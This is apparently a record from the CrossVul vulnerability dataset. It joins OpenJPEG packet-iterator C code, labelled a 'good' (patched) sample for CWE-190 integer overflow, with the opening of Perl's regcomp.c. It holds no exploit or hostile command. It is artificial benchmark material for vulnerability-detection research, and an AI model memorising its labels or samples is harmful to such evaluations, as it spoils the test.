l_data_stride * p_image->numcomps * sizeof(OPJ_UINT32));
if
(! l_tmp_data)
{
return 00;
}
l_tmp_ptr = (OPJ_UINT32**)opj_malloc(
p_image->numcomps * sizeof(OPJ_UINT32 *));
if
(! l_tmp_ptr)
{
opj_free(l_tmp_data);
return 00;
}
/* memory allocation for pi */
l_pi = opj_pi_create(p_image, p_cp, p_tile_no);
if (!l_pi) {
opj_free(l_tmp_data);
opj_free(l_tmp_ptr);
return 00;
}
l_encoding_value_ptr = l_tmp_data;
/* update pointer array */
for
(compno = 0; compno < p_image->numcomps; ++compno)
{
l_tmp_ptr[compno] = l_encoding_value_ptr;
l_encoding_value_ptr += l_data_stride;
}
/* get encoding parameters */
opj_get_all_encoding_parameters(p_image,p_cp,p_tile_no,&l_tx0,&l_tx1,&l_ty0,&l_ty1,&l_dx_min,&l_dy_min,&l_max_prec,&l_max_res,l_tmp_ptr);
/* step calculations */
l_step_p = 1;
l_step_c = l_max_prec * l_step_p;
l_step_r = p_image->numcomps * l_step_c;
l_step_l = l_max_res * l_step_r;
/* set values for first packet iterator */
l_current_pi = l_pi;
/* memory allocation for include */
l_current_pi->include = (OPJ_INT16*) opj_calloc((l_tcp->numlayers +1) * l_step_l, sizeof(OPJ_INT16));
if
(!l_current_pi->include)
{
opj_free(l_tmp_data);
opj_free(l_tmp_ptr);
opj_pi_destroy(l_pi, l_bound);
return 00;
}
/* special treatment for the first packet iterator */
l_current_comp = l_current_pi->comps;
l_img_comp = p_image->comps;
l_tccp = l_tcp->tccps;
l_current_pi->tx0 = l_tx0;
l_current_pi->ty0 = l_ty0;
l_current_pi->tx1 = l_tx1;
l_current_pi->ty1 = l_ty1;
/*l_current_pi->dx = l_img_comp->dx;*/
/*l_current_pi->dy = l_img_comp->dy;*/
l_current_pi->step_p = l_step_p;
l_current_pi->step_c = l_step_c;
l_current_pi->step_r = l_step_r;
l_current_pi->step_l = l_step_l;
/* allocation for components and number of components has already been calculated by opj_pi_create */
for
(compno = 0; compno < l_current_pi->numcomps; ++compno)
{
opj_pi_resolution_t *l_res = l_current_comp->resolutions;
l_encoding_value_ptr = l_tmp_ptr[compno];
l_current_comp->dx = l_img_comp->dx;
l_current_comp->dy = l_img_comp->dy;
/* resolutions have already been initialized */
for
(resno = 0; resno < l_current_comp->numresolutions; resno++)
{
l_res->pdx = *(l_encoding_value_ptr++);
l_res->pdy = *(l_encoding_value_ptr++);
l_res->pw = *(l_encoding_value_ptr++);
l_res->ph = *(l_encoding_value_ptr++);
++l_res;
}
++l_current_comp;
++l_img_comp;
++l_tccp;
}
++l_current_pi;
for (pino = 1 ; pino<l_bound ; ++pino )
{
l_current_comp = l_current_pi->comps;
l_img_comp = p_image->comps;
l_tccp = l_tcp->tccps;
l_current_pi->tx0 = l_tx0;
l_current_pi->ty0 = l_ty0;
l_current_pi->tx1 = l_tx1;
l_current_pi->ty1 = l_ty1;
/*l_current_pi->dx = l_dx_min;*/
/*l_current_pi->dy = l_dy_min;*/
l_current_pi->step_p = l_step_p;
l_current_pi->step_c = l_step_c;
l_current_pi->step_r = l_step_r;
l_current_pi->step_l = l_step_l;
/* allocation for components and number of components has already been calculated by opj_pi_create */
for
(compno = 0; compno < l_current_pi->numcomps; ++compno)
{
opj_pi_resolution_t *l_res = l_current_comp->resolutions;
l_encoding_value_ptr = l_tmp_ptr[compno];
l_current_comp->dx = l_img_comp->dx;
l_current_comp->dy = l_img_comp->dy;
/* resolutions have already been initialized */
for
(resno = 0; resno < l_current_comp->numresolutions; resno++)
{
l_res->pdx = *(l_encoding_value_ptr++);
l_res->pdy = *(l_encoding_value_ptr++);
l_res->pw = *(l_encoding_value_ptr++);
l_res->ph = *(l_encoding_value_ptr++);
++l_res;
}
++l_current_comp;
++l_img_comp;
++l_tccp;
}
/* special treatment*/
l_current_pi->include = (l_current_pi-1)->include;
++l_current_pi;
}
opj_free(l_tmp_data);
l_tmp_data = 00;
opj_free(l_tmp_ptr);
l_tmp_ptr = 00;
if
(l_tcp->POC)
{
opj_pi_update_decode_poc (l_pi,l_tcp,l_max_prec,l_max_res);
}
else
{
opj_pi_update_decode_not_poc(l_pi,l_tcp,l_max_prec,l_max_res);
}
return l_pi;
}
opj_pi_iterator_t *opj_pi_initialise_encode(const opj_image_t *p_image,
opj_cp_t *p_cp,
OPJ_UINT32 p_tile_no,
J2K_T2_MODE p_t2_mode )
{
/* loop*/
OPJ_UINT32 pino;
OPJ_UINT32 compno, resno;
/* to store w, h, dx and dy fro all components and resolutions*/
OPJ_UINT32 * l_tmp_data;
OPJ_UINT32 ** l_tmp_ptr;
/* encoding prameters to set*/
OPJ_UINT32 l_max_res;
OPJ_UINT32 l_max_prec;
OPJ_INT32 l_tx0,l_tx1,l_ty0,l_ty1;
OPJ_UINT32 l_dx_min,l_dy_min;
OPJ_UINT32 l_bound;
OPJ_UINT32 l_step_p , l_step_c , l_step_r , l_step_l ;
OPJ_UINT32 l_data_stride;
/* pointers*/
opj_pi_iterator_t *l_pi = 00;
opj_tcp_t *l_tcp = 00;
const opj_tccp_t *l_tccp = 00;
opj_pi_comp_t *l_current_comp = 00;
opj_image_comp_t * l_img_comp = 00;
opj_pi_iterator_t * l_current_pi = 00;
OPJ_UINT32 * l_encoding_value_ptr = 00;
/* preconditions in debug*/
assert(p_cp != 00);
assert(p_image != 00);
assert(p_tile_no < p_cp->tw * p_cp->th);
/* initializations*/
l_tcp = &p_cp->tcps[p_tile_no];
l_bound = l_tcp->numpocs+1;
l_data_stride = 4 * OPJ_J2K_MAXRLVLS;
l_tmp_data = (OPJ_UINT32*)opj_malloc(
l_data_stride * p_image->numcomps * sizeof(OPJ_UINT32));
if (! l_tmp_data) {
return 00;
}
l_tmp_ptr = (OPJ_UINT32**)opj_malloc(
p_image->numcomps * sizeof(OPJ_UINT32 *));
if (! l_tmp_ptr) {
opj_free(l_tmp_data);
return 00;
}
/* memory allocation for pi*/
l_pi = opj_pi_create(p_image,p_cp,p_tile_no);
if (!l_pi) {
opj_free(l_tmp_data);
opj_free(l_tmp_ptr);
return 00;
}
l_encoding_value_ptr = l_tmp_data;
/* update pointer array*/
for (compno = 0; compno < p_image->numcomps; ++compno) {
l_tmp_ptr[compno] = l_encoding_value_ptr;
l_encoding_value_ptr += l_data_stride;
}
/* get encoding parameters*/
opj_get_all_encoding_parameters(p_image,p_cp,p_tile_no,&l_tx0,&l_tx1,&l_ty0,&l_ty1,&l_dx_min,&l_dy_min,&l_max_prec,&l_max_res,l_tmp_ptr);
/* step calculations*/
l_step_p = 1;
l_step_c = l_max_prec * l_step_p;
l_step_r = p_image->numcomps * l_step_c;
l_step_l = l_max_res * l_step_r;
/* set values for first packet iterator*/
l_pi->tp_on = p_cp->m_specific_param.m_enc.m_tp_on;
l_current_pi = l_pi;
/* memory allocation for include*/
l_current_pi->include = (OPJ_INT16*) opj_calloc(l_tcp->numlayers * l_step_l, sizeof(OPJ_INT16));
if (!l_current_pi->include) {
opj_free(l_tmp_data);
opj_free(l_tmp_ptr);
opj_pi_destroy(l_pi, l_bound);
return 00;
}
/* special treatment for the first packet iterator*/
l_current_comp = l_current_pi->comps;
l_img_comp = p_image->comps;
l_tccp = l_tcp->tccps;
l_current_pi->tx0 = l_tx0;
l_current_pi->ty0 = l_ty0;
l_current_pi->tx1 = l_tx1;
l_current_pi->ty1 = l_ty1;
l_current_pi->dx = l_dx_min;
l_current_pi->dy = l_dy_min;
l_current_pi->step_p = l_step_p;
l_current_pi->step_c = l_step_c;
l_current_pi->step_r = l_step_r;
l_current_pi->step_l = l_step_l;
/* allocation for components and number of components has already been calculated by opj_pi_create */
for (compno = 0; compno < l_current_pi->numcomps; ++compno) {
opj_pi_resolution_t *l_res = l_current_comp->resolutions;
l_encoding_value_ptr = l_tmp_ptr[compno];
l_current_comp->dx = l_img_comp->dx;
l_current_comp->dy = l_img_comp->dy;
/* resolutions have already been initialized */
for (resno = 0; resno < l_current_comp->numresolutions; resno++) {
l_res->pdx = *(l_encoding_value_ptr++);
l_res->pdy = *(l_encoding_value_ptr++);
l_res->pw = *(l_encoding_value_ptr++);
l_res->ph = *(l_encoding_value_ptr++);
++l_res;
}
++l_current_comp;
++l_img_comp;
++l_tccp;
}
++l_current_pi;
for (pino = 1 ; pino<l_bound ; ++pino ) {
l_current_comp = l_current_pi->comps;
l_img_comp = p_image->comps;
l_tccp = l_tcp->tccps;
l_current_pi->tx0 = l_tx0;
l_current_pi->ty0 = l_ty0;
l_current_pi->tx1 = l_tx1;
l_current_pi->ty1 = l_ty1;
l_current_pi->dx = l_dx_min;
l_current_pi->dy = l_dy_min;
l_current_pi->step_p = l_step_p;
l_current_pi->step_c = l_step_c;
l_current_pi->step_r = l_step_r;
l_current_pi->step_l = l_step_l;
/* allocation for components and number of components has already been calculated by opj_pi_create */
for (compno = 0; compno < l_current_pi->numcomps; ++compno) {
opj_pi_resolution_t *l_res = l_current_comp->resolutions;
l_encoding_value_ptr = l_tmp_ptr[compno];
l_current_comp->dx = l_img_comp->dx;
l_current_comp->dy = l_img_comp->dy;
/* resolutions have already been initialized */
for (resno = 0; resno < l_current_comp->numresolutions; resno++) {
l_res->pdx = *(l_encoding_value_ptr++);
l_res->pdy = *(l_encoding_value_ptr++);
l_res->pw = *(l_encoding_value_ptr++);
l_res->ph = *(l_encoding_value_ptr++);
++l_res;
}
++l_current_comp;
++l_img_comp;
++l_tccp;
}
/* special treatment*/
l_current_pi->include = (l_current_pi-1)->include;
++l_current_pi;
}
opj_free(l_tmp_data);
l_tmp_data = 00;
opj_free(l_tmp_ptr);
l_tmp_ptr = 00;
if (l_tcp->POC && (OPJ_IS_CINEMA(p_cp->rsiz) || p_t2_mode == FINAL_PASS)) {
opj_pi_update_encode_poc_and_final(p_cp,p_tile_no,l_tx0,l_tx1,l_ty0,l_ty1,l_max_prec,l_max_res,l_dx_min,l_dy_min);
}
else {
opj_pi_update_encode_not_poc(p_cp,p_image->numcomps,p_tile_no,l_tx0,l_tx1,l_ty0,l_ty1,l_max_prec,l_max_res,l_dx_min,l_dy_min);
}
return l_pi;
}
void opj_pi_create_encode( opj_pi_iterator_t *pi,
opj_cp_t *cp,
OPJ_UINT32 tileno,
OPJ_UINT32 pino,
OPJ_UINT32 tpnum,
OPJ_INT32 tppos,
J2K_T2_MODE t2_mode)
{
const OPJ_CHAR *prog;
OPJ_INT32 i;
OPJ_UINT32 incr_top=1,resetX=0;
opj_tcp_t *tcps =&cp->tcps[tileno];
opj_poc_t *tcp= &tcps->pocs[pino];
prog = opj_j2k_convert_progression_order(tcp->prg);
pi[pino].first = 1;
pi[pino].poc.prg = tcp->prg;
if(!(cp->m_specific_param.m_enc.m_tp_on && ((!OPJ_IS_CINEMA(cp->rsiz) && (t2_mode == FINAL_PASS)) || OPJ_IS_CINEMA(cp->rsiz)))){
pi[pino].poc.resno0 = tcp->resS;
pi[pino].poc.resno1 = tcp->resE;
pi[pino].poc.compno0 = tcp->compS;
pi[pino].poc.compno1 = tcp->compE;
pi[pino].poc.layno0 = tcp->layS;
pi[pino].poc.layno1 = tcp->layE;
pi[pino].poc.precno0 = tcp->prcS;
pi[pino].poc.precno1 = tcp->prcE;
pi[pino].poc.tx0 = (OPJ_INT32)tcp->txS;
pi[pino].poc.ty0 = (OPJ_INT32)tcp->tyS;
pi[pino].poc.tx1 = (OPJ_INT32)tcp->txE;
pi[pino].poc.ty1 = (OPJ_INT32)tcp->tyE;
}else {
for(i=tppos+1;i<4;i++){
switch(prog[i]){
case 'R':
pi[pino].poc.resno0 = tcp->resS;
pi[pino].poc.resno1 = tcp->resE;
break;
case 'C':
pi[pino].poc.compno0 = tcp->compS;
pi[pino].poc.compno1 = tcp->compE;
break;
case 'L':
pi[pino].poc.layno0 = tcp->layS;
pi[pino].poc.layno1 = tcp->layE;
break;
case 'P':
switch(tcp->prg){
case OPJ_LRCP:
case OPJ_RLCP:
pi[pino].poc.precno0 = tcp->prcS;
pi[pino].poc.precno1 = tcp->prcE;
break;
default:
pi[pino].poc.tx0 = (OPJ_INT32)tcp->txS;
pi[pino].poc.ty0 = (OPJ_INT32)tcp->tyS;
pi[pino].poc.tx1 = (OPJ_INT32)tcp->txE;
pi[pino].poc.ty1 = (OPJ_INT32)tcp->tyE;
break;
}
break;
}
}
if(tpnum==0){
for(i=tppos;i>=0;i--){
switch(prog[i]){
case 'C':
tcp->comp_t = tcp->compS;
pi[pino].poc.compno0 = tcp->comp_t;
pi[pino].poc.compno1 = tcp->comp_t+1;
tcp->comp_t+=1;
break;
case 'R':
tcp->res_t = tcp->resS;
pi[pino].poc.resno0 = tcp->res_t;
pi[pino].poc.resno1 = tcp->res_t+1;
tcp->res_t+=1;
break;
case 'L':
tcp->lay_t = tcp->layS;
pi[pino].poc.layno0 = tcp->lay_t;
pi[pino].poc.layno1 = tcp->lay_t+1;
tcp->lay_t+=1;
break;
case 'P':
switch(tcp->prg){
case OPJ_LRCP:
case OPJ_RLCP:
tcp->prc_t = tcp->prcS;
pi[pino].poc.precno0 = tcp->prc_t;
pi[pino].poc.precno1 = tcp->prc_t+1;
tcp->prc_t+=1;
break;
default:
tcp->tx0_t = tcp->txS;
tcp->ty0_t = tcp->tyS;
pi[pino].poc.tx0 = (OPJ_INT32)tcp->tx0_t;
pi[pino].poc.tx1 = (OPJ_INT32)(tcp->tx0_t + tcp->dx - (tcp->tx0_t % tcp->dx));
pi[pino].poc.ty0 = (OPJ_INT32)tcp->ty0_t;
pi[pino].poc.ty1 = (OPJ_INT32)(tcp->ty0_t + tcp->dy - (tcp->ty0_t % tcp->dy));
tcp->tx0_t = (OPJ_UINT32)pi[pino].poc.tx1;
tcp->ty0_t = (OPJ_UINT32)pi[pino].poc.ty1;
break;
}
break;
}
}
incr_top=1;
}else{
for(i=tppos;i>=0;i--){
switch(prog[i]){
case 'C':
pi[pino].poc.compno0 = tcp->comp_t-1;
pi[pino].poc.compno1 = tcp->comp_t;
break;
case 'R':
pi[pino].poc.resno0 = tcp->res_t-1;
pi[pino].poc.resno1 = tcp->res_t;
break;
case 'L':
pi[pino].poc.layno0 = tcp->lay_t-1;
pi[pino].poc.layno1 = tcp->lay_t;
break;
case 'P':
switch(tcp->prg){
case OPJ_LRCP:
case OPJ_RLCP:
pi[pino].poc.precno0 = tcp->prc_t-1;
pi[pino].poc.precno1 = tcp->prc_t;
break;
default:
pi[pino].poc.tx0 = (OPJ_INT32)(tcp->tx0_t - tcp->dx - (tcp->tx0_t % tcp->dx));
pi[pino].poc.tx1 = (OPJ_INT32)tcp->tx0_t ;
pi[pino].poc.ty0 = (OPJ_INT32)(tcp->ty0_t - tcp->dy - (tcp->ty0_t % tcp->dy));
pi[pino].poc.ty1 = (OPJ_INT32)tcp->ty0_t ;
break;
}
break;
}
if(incr_top==1){
switch(prog[i]){
case 'R':
if(tcp->res_t==tcp->resE){
if(opj_pi_check_next_level(i-1,cp,tileno,pino,prog)){
tcp->res_t = tcp->resS;
pi[pino].poc.resno0 = tcp->res_t;
pi[pino].poc.resno1 = tcp->res_t+1;
tcp->res_t+=1;
incr_top=1;
}else{
incr_top=0;
}
}else{
pi[pino].poc.resno0 = tcp->res_t;
pi[pino].poc.resno1 = tcp->res_t+1;
tcp->res_t+=1;
incr_top=0;
}
break;
case 'C':
if(tcp->comp_t ==tcp->compE){
if(opj_pi_check_next_level(i-1,cp,tileno,pino,prog)){
tcp->comp_t = tcp->compS;
pi[pino].poc.compno0 = tcp->comp_t;
pi[pino].poc.compno1 = tcp->comp_t+1;
tcp->comp_t+=1;
incr_top=1;
}else{
incr_top=0;
}
}else{
pi[pino].poc.compno0 = tcp->comp_t;
pi[pino].poc.compno1 = tcp->comp_t+1;
tcp->comp_t+=1;
incr_top=0;
}
break;
case 'L':
if(tcp->lay_t == tcp->layE){
if(opj_pi_check_next_level(i-1,cp,tileno,pino,prog)){
tcp->lay_t = tcp->layS;
pi[pino].poc.layno0 = tcp->lay_t;
pi[pino].poc.layno1 = tcp->lay_t+1;
tcp->lay_t+=1;
incr_top=1;
}else{
incr_top=0;
}
}else{
pi[pino].poc.layno0 = tcp->lay_t;
pi[pino].poc.layno1 = tcp->lay_t+1;
tcp->lay_t+=1;
incr_top=0;
}
break;
case 'P':
switch(tcp->prg){
case OPJ_LRCP:
case OPJ_RLCP:
if(tcp->prc_t == tcp->prcE){
if(opj_pi_check_next_level(i-1,cp,tileno,pino,prog)){
tcp->prc_t = tcp->prcS;
pi[pino].poc.precno0 = tcp->prc_t;
pi[pino].poc.precno1 = tcp->prc_t+1;
tcp->prc_t+=1;
incr_top=1;
}else{
incr_top=0;
}
}else{
pi[pino].poc.precno0 = tcp->prc_t;
pi[pino].poc.precno1 = tcp->prc_t+1;
tcp->prc_t+=1;
incr_top=0;
}
break;
default:
if(tcp->tx0_t >= tcp->txE){
if(tcp->ty0_t >= tcp->tyE){
if(opj_pi_check_next_level(i-1,cp,tileno,pino,prog)){
tcp->ty0_t = tcp->tyS;
pi[pino].poc.ty0 = (OPJ_INT32)tcp->ty0_t;
pi[pino].poc.ty1 = (OPJ_INT32)(tcp->ty0_t + tcp->dy - (tcp->ty0_t % tcp->dy));
tcp->ty0_t = (OPJ_UINT32)pi[pino].poc.ty1;
incr_top=1;resetX=1;
}else{
incr_top=0;resetX=0;
}
}else{
pi[pino].poc.ty0 = (OPJ_INT32)tcp->ty0_t;
pi[pino].poc.ty1 = (OPJ_INT32)(tcp->ty0_t + tcp->dy - (tcp->ty0_t % tcp->dy));
tcp->ty0_t = (OPJ_UINT32)pi[pino].poc.ty1;
incr_top=0;resetX=1;
}
if(resetX==1){
tcp->tx0_t = tcp->txS;
pi[pino].poc.tx0 = (OPJ_INT32)tcp->tx0_t;
pi[pino].poc.tx1 = (OPJ_INT32)(tcp->tx0_t + tcp->dx- (tcp->tx0_t % tcp->dx));
tcp->tx0_t = (OPJ_UINT32)pi[pino].poc.tx1;
}
}else{
pi[pino].poc.tx0 = (OPJ_INT32)tcp->tx0_t;
pi[pino].poc.tx1 = (OPJ_INT32)(tcp->tx0_t + tcp->dx- (tcp->tx0_t % tcp->dx));
tcp->tx0_t = (OPJ_UINT32)pi[pino].poc.tx1;
incr_top=0;
}
break;
}
break;
}
}
}
}
}
}
void opj_pi_destroy(opj_pi_iterator_t *p_pi,
OPJ_UINT32 p_nb_elements)
{
OPJ_UINT32 compno, pino;
opj_pi_iterator_t *l_current_pi = p_pi;
if (p_pi) {
if (p_pi->include) {
opj_free(p_pi->include);
p_pi->include = 00;
}
for (pino = 0; pino < p_nb_elements; ++pino){
if(l_current_pi->comps) {
opj_pi_comp_t *l_current_component = l_current_pi->comps;
for (compno = 0; compno < l_current_pi->numcomps; compno++){
if(l_current_component->resolutions) {
opj_free(l_current_component->resolutions);
l_current_component->resolutions = 00;
}
++l_current_component;
}
opj_free(l_current_pi->comps);
l_current_pi->comps = 0;
}
++l_current_pi;
}
opj_free(p_pi);
}
}
void opj_pi_update_encoding_parameters( const opj_image_t *p_image,
opj_cp_t *p_cp,
OPJ_UINT32 p_tile_no )
{
/* encoding parameters to set */
OPJ_UINT32 l_max_res;
OPJ_UINT32 l_max_prec;
OPJ_INT32 l_tx0,l_tx1,l_ty0,l_ty1;
OPJ_UINT32 l_dx_min,l_dy_min;
/* pointers */
opj_tcp_t *l_tcp = 00;
/* preconditions */
assert(p_cp != 00);
assert(p_image != 00);
assert(p_tile_no < p_cp->tw * p_cp->th);
l_tcp = &(p_cp->tcps[p_tile_no]);
/* get encoding parameters */
opj_get_encoding_parameters(p_image,p_cp,p_tile_no,&l_tx0,&l_tx1,&l_ty0,&l_ty1,&l_dx_min,&l_dy_min,&l_max_prec,&l_max_res);
if (l_tcp->POC) {
opj_pi_update_encode_poc_and_final(p_cp,p_tile_no,l_tx0,l_tx1,l_ty0,l_ty1,l_max_prec,l_max_res,l_dx_min,l_dy_min);
}
else {
opj_pi_update_encode_not_poc(p_cp,p_image->numcomps,p_tile_no,l_tx0,l_tx1,l_ty0,l_ty1,l_max_prec,l_max_res,l_dx_min,l_dy_min);
}
}
OPJ_BOOL opj_pi_next(opj_pi_iterator_t * pi) {
switch (pi->poc.prg) {
case OPJ_LRCP:
return opj_pi_next_lrcp(pi);
case OPJ_RLCP:
return opj_pi_next_rlcp(pi);
case OPJ_RPCL:
return opj_pi_next_rpcl(pi);
case OPJ_PCRL:
return opj_pi_next_pcrl(pi);
case OPJ_CPRL:
return opj_pi_next_cprl(pi);
case OPJ_PROG_UNKNOWN:
return OPJ_FALSE;
}
return OPJ_FALSE;
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_540_0 |
crossvul-cpp_data_good_3885_3 | /* regcomp.c
*/
/*
* 'A fair jaw-cracker dwarf-language must be.' --Samwise Gamgee
*
* [p.285 of _The Lord of the Rings_, II/iii: "The Ring Goes South"]
*/
/* This file contains functions for compiling a regular expression. See
* also regexec.c which funnily enough, contains functions for executing
* a regular expression.
*
* This file is also copied at build time to ext/re/re_comp.c, where
* it's built with -DPERL_EXT_RE_BUILD -DPERL_EXT_RE_DEBUG -DPERL_EXT.
* This causes the main functions to be compiled under new names and with
* debugging support added, which makes "use re 'debug'" work.
*/
/* NOTE: this is derived from Henry Spencer's regexp code, and should not
* confused with the original package (see point 3 below). Thanks, Henry!
*/
/* Additional note: this code is very heavily munged from Henry's version
* in places. In some spots I've traded clarity for efficiency, so don't
* blame Henry for some of the lack of readability.
*/
/* The names of the functions have been changed from regcomp and
* regexec to pregcomp and pregexec in order to avoid conflicts
* with the POSIX routines of the same names.
*/
#ifdef PERL_EXT_RE_BUILD
#include "re_top.h"
#endif
/*
* pregcomp and pregexec -- regsub and regerror are not used in perl
*
* Copyright (c) 1986 by University of Toronto.
* Written by Henry Spencer. Not derived from licensed software.
*
* Permission is granted to anyone to use this software for any
* purpose on any computer system, and to redistribute it freely,
* subject to the following restrictions:
*
* 1. The author is not responsible for the consequences of use of
* this software, no matter how awful, even if they arise
* from defects in it.
*
* 2. The origin of this software must not be misrepresented, either
* by explicit claim or by omission.
*
* 3. Altered versions must be plainly marked as such, and must not
* be misrepresented as being the original software.
*
*
**** Alterations to Henry's code are...
****
**** Copyright (C) 1991, 1992, 1993, 1994, 1995, 1996, 1997, 1998, 1999,
**** 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008
**** by Larry Wall and others
****
**** You may distribute under the terms of either the GNU General Public
**** License or the Artistic License, as specified in the README file.
*
* Beware that some of this code is subtly aware of the way operator
* precedence is structured in regular expressions. Serious changes in
* regular-expression syntax might require a total rethink.
*/
#include "EXTERN.h"
#define PERL_IN_REGCOMP_C
#include "perl.h"
#define REG_COMP_C
#ifdef PERL_IN_XSUB_RE
# include "re_comp.h"
EXTERN_C const struct regexp_engine my_reg_engine;
#else
# include "regcomp.h"
#endif
#include "dquote_inline.h"
#include "invlist_inline.h"
#include "unicode_constants.h"
#define HAS_NONLATIN1_FOLD_CLOSURE(i) \
_HAS_NONLATIN1_FOLD_CLOSURE_ONLY_FOR_USE_BY_REGCOMP_DOT_C_AND_REGEXEC_DOT_C(i)
#define HAS_NONLATIN1_SIMPLE_FOLD_CLOSURE(i) \
_HAS_NONLATIN1_SIMPLE_FOLD_CLOSURE_ONLY_FOR_USE_BY_REGCOMP_DOT_C_AND_REGEXEC_DOT_C(i)
#define IS_NON_FINAL_FOLD(c) _IS_NON_FINAL_FOLD_ONLY_FOR_USE_BY_REGCOMP_DOT_C(c)
#define IS_IN_SOME_FOLD_L1(c) _IS_IN_SOME_FOLD_ONLY_FOR_USE_BY_REGCOMP_DOT_C(c)
#ifndef STATIC
#define STATIC static
#endif
/* this is a chain of data about sub patterns we are processing that
need to be handled separately/specially in study_chunk. Its so
we can simulate recursion without losing state. */
struct scan_frame;
typedef struct scan_frame {
regnode *last_regnode; /* last node to process in this frame */
regnode *next_regnode; /* next node to process when last is reached */
U32 prev_recursed_depth;
I32 stopparen; /* what stopparen do we use */
struct scan_frame *this_prev_frame; /* this previous frame */
struct scan_frame *prev_frame; /* previous frame */
struct scan_frame *next_frame; /* next frame */
} scan_frame;
/* Certain characters are output as a sequence with the first being a
* backslash. */
#define isBACKSLASHED_PUNCT(c) strchr("-[]\\^", c)
struct RExC_state_t {
U32 flags; /* RXf_* are we folding, multilining? */
U32 pm_flags; /* PMf_* stuff from the calling PMOP */
char *precomp; /* uncompiled string. */
char *precomp_end; /* pointer to end of uncompiled string. */
REGEXP *rx_sv; /* The SV that is the regexp. */
regexp *rx; /* perl core regexp structure */
regexp_internal *rxi; /* internal data for regexp object
pprivate field */
char *start; /* Start of input for compile */
char *end; /* End of input for compile */
char *parse; /* Input-scan pointer. */
char *copy_start; /* start of copy of input within
constructed parse string */
char *save_copy_start; /* Provides one level of saving
and restoring 'copy_start' */
char *copy_start_in_input; /* Position in input string
corresponding to copy_start */
SSize_t whilem_seen; /* number of WHILEM in this expr */
regnode *emit_start; /* Start of emitted-code area */
regnode_offset emit; /* Code-emit pointer */
I32 naughty; /* How bad is this pattern? */
I32 sawback; /* Did we see \1, ...? */
U32 seen;
SSize_t size; /* Number of regnode equivalents in
pattern */
/* position beyond 'precomp' of the warning message furthest away from
* 'precomp'. During the parse, no warnings are raised for any problems
* earlier in the parse than this position. This works if warnings are
* raised the first time a given spot is parsed, and if only one
* independent warning is raised for any given spot */
Size_t latest_warn_offset;
I32 npar; /* Capture buffer count so far in the
parse, (OPEN) plus one. ("par" 0 is
the whole pattern)*/
I32 total_par; /* During initial parse, is either 0,
or -1; the latter indicating a
reparse is needed. After that pass,
it is what 'npar' became after the
pass. Hence, it being > 0 indicates
we are in a reparse situation */
I32 nestroot; /* root parens we are in - used by
accept */
I32 seen_zerolen;
regnode_offset *open_parens; /* offsets to open parens */
regnode_offset *close_parens; /* offsets to close parens */
I32 parens_buf_size; /* #slots malloced open/close_parens */
regnode *end_op; /* END node in program */
I32 utf8; /* whether the pattern is utf8 or not */
I32 orig_utf8; /* whether the pattern was originally in utf8 */
/* XXX use this for future optimisation of case
* where pattern must be upgraded to utf8. */
I32 uni_semantics; /* If a d charset modifier should use unicode
rules, even if the pattern is not in
utf8 */
HV *paren_names; /* Paren names */
regnode **recurse; /* Recurse regops */
I32 recurse_count; /* Number of recurse regops we have generated */
U8 *study_chunk_recursed; /* bitmap of which subs we have moved
through */
U32 study_chunk_recursed_bytes; /* bytes in bitmap */
I32 in_lookbehind;
I32 contains_locale;
I32 override_recoding;
#ifdef EBCDIC
I32 recode_x_to_native;
#endif
I32 in_multi_char_class;
struct reg_code_blocks *code_blocks;/* positions of literal (?{})
within pattern */
int code_index; /* next code_blocks[] slot */
SSize_t maxlen; /* mininum possible number of chars in string to match */
scan_frame *frame_head;
scan_frame *frame_last;
U32 frame_count;
AV *warn_text;
HV *unlexed_names;
#ifdef ADD_TO_REGEXEC
char *starttry; /* -Dr: where regtry was called. */
#define RExC_starttry (pRExC_state->starttry)
#endif
SV *runtime_code_qr; /* qr with the runtime code blocks */
#ifdef DEBUGGING
const char *lastparse;
I32 lastnum;
AV *paren_name_list; /* idx -> name */
U32 study_chunk_recursed_count;
SV *mysv1;
SV *mysv2;
#define RExC_lastparse (pRExC_state->lastparse)
#define RExC_lastnum (pRExC_state->lastnum)
#define RExC_paren_name_list (pRExC_state->paren_name_list)
#define RExC_study_chunk_recursed_count (pRExC_state->study_chunk_recursed_count)
#define RExC_mysv (pRExC_state->mysv1)
#define RExC_mysv1 (pRExC_state->mysv1)
#define RExC_mysv2 (pRExC_state->mysv2)
#endif
bool seen_d_op;
bool strict;
bool study_started;
bool in_script_run;
bool use_BRANCHJ;
};
#define RExC_flags (pRExC_state->flags)
#define RExC_pm_flags (pRExC_state->pm_flags)
#define RExC_precomp (pRExC_state->precomp)
#define RExC_copy_start_in_input (pRExC_state->copy_start_in_input)
#define RExC_copy_start_in_constructed (pRExC_state->copy_start)
#define RExC_save_copy_start_in_constructed (pRExC_state->save_copy_start)
#define RExC_precomp_end (pRExC_state->precomp_end)
#define RExC_rx_sv (pRExC_state->rx_sv)
#define RExC_rx (pRExC_state->rx)
#define RExC_rxi (pRExC_state->rxi)
#define RExC_start (pRExC_state->start)
#define RExC_end (pRExC_state->end)
#define RExC_parse (pRExC_state->parse)
#define RExC_latest_warn_offset (pRExC_state->latest_warn_offset )
#define RExC_whilem_seen (pRExC_state->whilem_seen)
#define RExC_seen_d_op (pRExC_state->seen_d_op) /* Seen something that differs
under /d from /u ? */
#ifdef RE_TRACK_PATTERN_OFFSETS
# define RExC_offsets (RExC_rxi->u.offsets) /* I am not like the
others */
#endif
#define RExC_emit (pRExC_state->emit)
#define RExC_emit_start (pRExC_state->emit_start)
#define RExC_sawback (pRExC_state->sawback)
#define RExC_seen (pRExC_state->seen)
#define RExC_size (pRExC_state->size)
#define RExC_maxlen (pRExC_state->maxlen)
#define RExC_npar (pRExC_state->npar)
#define RExC_total_parens (pRExC_state->total_par)
#define RExC_parens_buf_size (pRExC_state->parens_buf_size)
#define RExC_nestroot (pRExC_state->nestroot)
#define RExC_seen_zerolen (pRExC_state->seen_zerolen)
#define RExC_utf8 (pRExC_state->utf8)
#define RExC_uni_semantics (pRExC_state->uni_semantics)
#define RExC_orig_utf8 (pRExC_state->orig_utf8)
#define RExC_open_parens (pRExC_state->open_parens)
#define RExC_close_parens (pRExC_state->close_parens)
#define RExC_end_op (pRExC_state->end_op)
#define RExC_paren_names (pRExC_state->paren_names)
#define RExC_recurse (pRExC_state->recurse)
#define RExC_recurse_count (pRExC_state->recurse_count)
#define RExC_study_chunk_recursed (pRExC_state->study_chunk_recursed)
#define RExC_study_chunk_recursed_bytes \
(pRExC_state->study_chunk_recursed_bytes)
